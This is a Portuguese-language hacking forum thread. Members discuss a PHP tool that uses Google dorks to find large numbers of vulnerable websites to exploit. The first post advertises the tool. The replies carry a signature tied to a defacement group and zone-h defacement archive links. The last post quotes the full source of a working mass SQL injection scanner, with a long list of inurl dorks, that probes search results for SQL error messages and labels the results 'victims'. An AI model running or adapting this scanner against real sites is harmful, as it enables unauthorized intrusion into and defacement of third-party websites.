Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Tool Scan PHP - Filtro de sites (burlando google)

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Dica Tool Scan PHP - Filtro de sites (burlando google)

    Fala galera, vou postar aqui um video referente a ferramente de filtro de links usando d0rks em PHP.

    A ferramenta burla o filtro do google.

    Ajuda muita a encontrar massa de sites para explorar vulnerabilidades.

    confiram.


    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Código PHP:
    <?php

    namespace Go\To\EvilC0de;

    use 
    DrSpy;

    (new 
    DrSpy())->addToGroup(
    'Pr0j3ct046'
    );
    echo 
    'http://www.zone-h.org/archive/notifier=Pr0j3ct%20046';
    echo 
    'http://zone-h.org/archive/notifier=1923Turk';
    Similar Threads

  • Font Size
    #2
    Tem um bem parecido do MiyaChung, posta o Source desse ai pra nós, e vc se basiou no do MiyaChung ?

    Obrigado.

    Comment


    • Font Size
      #3
      Não tinha ouvido falar nesse.

      Depois vou postar sim, fiz com PHP OO + Jquery para chamadas de Ajax.
      Usei curl para requisição do google e Expressão regular para filtrar as urls.

      Flwww
      Código PHP:
      <?php

      namespace Go\To\EvilC0de;

      use 
      DrSpy;

      (new 
      DrSpy())->addToGroup(
      'Pr0j3ct046'
      );
      echo 
      'http://www.zone-h.org/archive/notifier=Pr0j3ct%20046';
      echo 
      'http://zone-h.org/archive/notifier=1923Turk';

      Comment


      • Font Size
        #4
        Postado Originalmente por Dr.Spy Ver Post
        Não tinha ouvido falar nesse.

        Depois vou postar sim, fiz com PHP OO + Jquery para chamadas de Ajax.
        Usei curl para requisição do google e Expressão regular para filtrar as urls.

        Flwww
        Então.. o que eu estava me referindo é esse aqui:

        <?php

        set_time_limit(0);
        ini_set('memory_limit', '64M');
        header('Content-Type: text/html; charset=UTF-8');

        $error[] = 'You have an error in your SQL';
        $error[] = 'supplied argument is not a valid MySQL result resource in';
        $error[] = 'Division by zero in';
        $error[] = 'Call to a member function';
        $error[] = 'Microsoft JET Database';
        $error[] = 'ODBC Microsoft Access Driver';
        $error[] = 'Microsoft OLE DB Provider for SQL Server';
        $error[] = 'Unclosed quotation mark';
        $error[] = 'Microsoft OLE DB Provider for Oracle';
        $error[] = 'Incorrect syntax near';
        $error[] = 'SQL query failed';

        function letItBy(){ ob_flush(); flush(); }

        function google_that($query, $page=1){

        $resultPerPage=8; //max result per page is 8 (GOOGLE rules)

        $start = $page*$resultPerPage;

        $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start }&q=" . urlencode($query);

        /* Get result */
        $resultFromGoogle = json_decode( http_get($url, true) ,true);

        /* Check result */
        if(isset($resultFromGoogle['responseStatus'])){

        /* Check response status */
        if($resultFromGoogle['responseStatus'] != '200') return false; //die( 'The function <b>' . __FUNCTION__ . '</b> Kill me <br>' . $resultFromGoogle['responseDetails'] . '<br>' .$url );

        /* Count results */
        if(sizeof($resultFromGoogle['responseData']['results']) == 0) return false; //if no results return false
        else return $resultFromGoogle['responseData']['results']; //return the results
        }
        /*
        if this function kill the script, go to --> Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... AND LEARN!!
        */
        else
        die('The function <b>' . __FUNCTION__ . '</b> Kill me <br>' . $url );

        }

        function http_get($url, $safemode = false){
        if($safemode === true) sleep(1); // safe mode, i dont want GOOGLE ban me..
        $im = curl_init($url);
        curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($im, CURLOPT_HEADER, 0);
        return curl_exec($im);
        curl_close();
        }

        function check_injection($url){
        $data = http_get( str_replace("=", "='", $url) );
        $errors = implode("|", $GLOBALS['error']);
        return preg_match("#{$errors}#i", $data);
        }

        ?>
        <!DOCTYPE html>
        <html>
        <head>
        <meta name="Content-Type" content="text/html; charset=UTF-8">
        <title>SQL Injection Scanner</title>
        <style type="text/css">
        body{ background-color:#000000; font: normal 18px Arial; color:#ffffff;}
        input{ border-width:0px; padding:2px; width:250px; }
        a{ text-decoration:none; color:#ffffff;}
        #button{ width:50px;}
        #result{margin:10px;}
        #result span{display:block;}
        #result .Y{background-color:green;}
        #result .X{background-color:red;}
        </style>
        </head>
        <body>
        <form method="post">
        Dork
        <select onchange="document.getElementById('dork').value=th is.options[this.selectedIndex].text;"><!-- By Styx Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... --><option>inurl:trainers.php?id=</option><option>inurl:buy.php?category=</option><option>inurl:article.php?ID=</option><option>inurllay_old.php?id=</option><option>inurl:declaration_more.php?decl_id= </option><option>inurlageid=</option><option>inurl:games.php?id=</option><option>inurlage.php?file=</option><option>inurl:newsDetail.php?id=</option><option>inurl:gallery.php?id=</option><option>inurl:article.php?id=</option><option>inurl:show.php?id=</option><option>inurl:staff_id=</option><option>inurl:newsitem.php?num=</option><option>inurl:readnews.php?id=</option><option>inurl:top10.php?cat=</option><option>inurl:historialeer.php?num=</option><option>inurl:reagir.php?num=</option><option>inurl:Stray-Questions-View.php?num=</option><option>inurl:forum_bds.php?num=</option><option>inurl:game.php?id=</option><option>inurl:view_product.php?id=</option><option>inurl:newsone.php?id=</option><option>inurl:sw_comment.php?id=</option><option>inurl:news.php?id=</option><option>inurl:avd_start.php?avd=</option><option>inurl:event.php?id=</option><option>inurlroduct-item.php?id=</option><option>inurl:sql.php?id=</option><option>inurl:news_view.php?id=</option><option>inurl:select_biblio.php?id=</option><option>inurl:humor.php?id=</option><option>inurl:aboutbook.php?id=</option><option>inurlgl_inet.php?ogl_id=</option><option>inurl:fiche_spectacle.php?id=</option><option>inurl:communique_detail.php?id=</option><option>inurl:sem.php3?id=</option><option>inurl:kategorie.php4?id=</option><option>inurl:news.php?id=</option><option>inurl:index.php?id=</option><option>inurl:faq2.php?id=</option><option>inurl:show_an.php?id=</option><option>inurlreview.php?id=</option><option>inurl:loadpsb.php?id=</option><option>inurlpinions.php?id=</option><option>inurl:spr.php?id=</option><option>inurlages.php?id=</option><option>inurl:announce.php?id=</option><option>inurl:clanek.php4?id=</option><option>inurlarticipant.php?id=</option><option>inurl:download.php?id=</option><option>inurl:main.php?id=</option><option>inurl:review.php?id=</option><option>inurl:chappies.php?id=</option><option>inurl:read.php?id=</option><option>inurlrod_detail.php?id=</option><option>inurl:viewphoto.php?id=</option><option>inurl:article.php?id=</option><option>inurlerson.php?id=</option><option>inurlroductinfo.php?id=</option><option>inurl:showimg.php?id=</option><option>inurl:view.php?id=</option><option>inurl:website.php?id=</option><option>inurl:hosting_info.php?id=</option><option>inurl:gallery.php?id=</option><option>inurl:rub.php?idr=</option><option>inurl:view_faq.php?id=</option><option>inurl:artikelinfo.php?id=</option><option>inurl:detail.php?ID=</option><option>inurl:index.php?=</option><option>inurlrofile_view.php?id=</option><option>inurl:category.php?id=</option><option>inurlublications.php?id=</option><option>inurl:fellows.php?id=</option><option>inurl:downloads_info.php?id=</option><option>inurlrod_info.php?id=</option><option>inurl:shop.php?do=part&id=</option><option>inurlroductinfo.php?id=</option><option>inurl:collectionitem.php?id=</option><option>inurl:band_info.php?id=</option><option>inurlroduct.php?id=</option><option>inurl:releases.php?id=</option><option>inurl:ray.php?id=</option><option>inurlroduit.php?id=</option><option>inurlop.php?id=</option><option>inurl:shopping.php?id=</option><option>inurlroductdetail.php?id=</option><option>inurlost.php?id=</option><option>inurl:viewshowdetail.php?id=</option><option>inurl:clubpage.php?id=</option><option>inurl:memberInfo.php?id=</option><option>inurl:section.php?id=</option><option>inurl:theme.php?id=</option><option>inurlage.php?id=</option><option>inurl:shredder-categories.php?id=</option><option>inurl:tradeCategory.php?id=</option><option>inurlroduct_ranges_view.php?ID=</option><option>inurl:shop_category.php?id=</option><option>inurl:transcript.php?id=</option><option>inurl:channel_id=</option><option>inurl:item_id=</option><option>inurl:newsid=</option><option>inurl:trainers.php?id=</option><option>inurl:news-full.php?id=</option><option>inurl:news_display.php?getid=</option><option>inurl:index2.php?option=</option><option>inurl:readnews.php?id=</option><option>inurl:top10.php?cat=</option><option>inurl:newsone.php?id=</option><option>inurl:event.php?id=</option><option>inurlroduct-item.php?id=</option><option>inurl:sql.php?id=</option><option>inurl:aboutbook.php?id=</option><option>inurlreview.php?id=</option><option>inurl:loadpsb.php?id=</option><option>inurlages.php?id=</option><option>inurl:material.php?id=</option><option>inurl:clanek.php4?id=</option><option>inurl:announce.php?id=</option><option>inurl:chappies.php?id=</option><option>inurl:read.php?id=</option><option>inurl:viewapp.php?id=</option><option>inurl:viewphoto.php?id=</option><option>inurl:rub.php?idr=</option><option>inurl:galeri_info.php?l=</option><option>inurl:review.php?id=</option><option>inurl:iniziativa.php?in=</option><option>inurl:curriculum.php?id=</option><option>inurl:labels.php?id=</option><option>inurl:story.php?id=</option><option>inurl:look.php?ID=</option><option>inurl:newsone.php?id=</option><option>inurl:aboutbook.php?id=</option><option>inurl:material.php?id=</option><option>inurlpinions.php?id=</option><option>inurl:announce.php?id=</option><option>inurl:rub.php?idr=</option><option>inurl:galeri_info.php?l=</option><option>inurl:tekst.php?idt=</option><option>inurl:newscat.php?id=</option><option>inurl:newsticker_info.php?idn=</option><option>inurl:rubrika.php?idr=</option><option>inurl:rubp.php?idr=</option><option>inurlffer.php?idf=</option><option>inurl:art.php?idm=</option><option>inurl:title.php?id=</option></select>
        <input type="text" id="dork" name="dork" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'inurlhp?id='; ?>" />
        <input type="submit" value="Iniciar" id="button"/>
        </form>
        <?php
        if(isset($_POST['dork']{0})){

        echo '<div id="result">Buscando..<br>';
        letItBy();
        for($googlePage = 1; $googlePage <= 10; $googlePage++){

        $googleResult = google_that($_POST['dork'], $googlePage);
        if(!$googleResult){
        echo 'Terminou..';
        break;
        }

        for($victim = 0; $victim < sizeof($googleResult); $victim++){

        if(check_injection($googleResult[$victim]['unescapedUrl'])){
        echo '<span class="Y">';
        // file_put_contents("log.txt", "{$googleResult[$victim]['unescapedUrl']}\n");
        }
        else echo '<span class="X">';

        echo "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a></span>\n";
        letItBy();
        }
        }
        echo '</div>';
        }
        ?>

        </body>
        </html>

        Comment

        X
        Working...
        X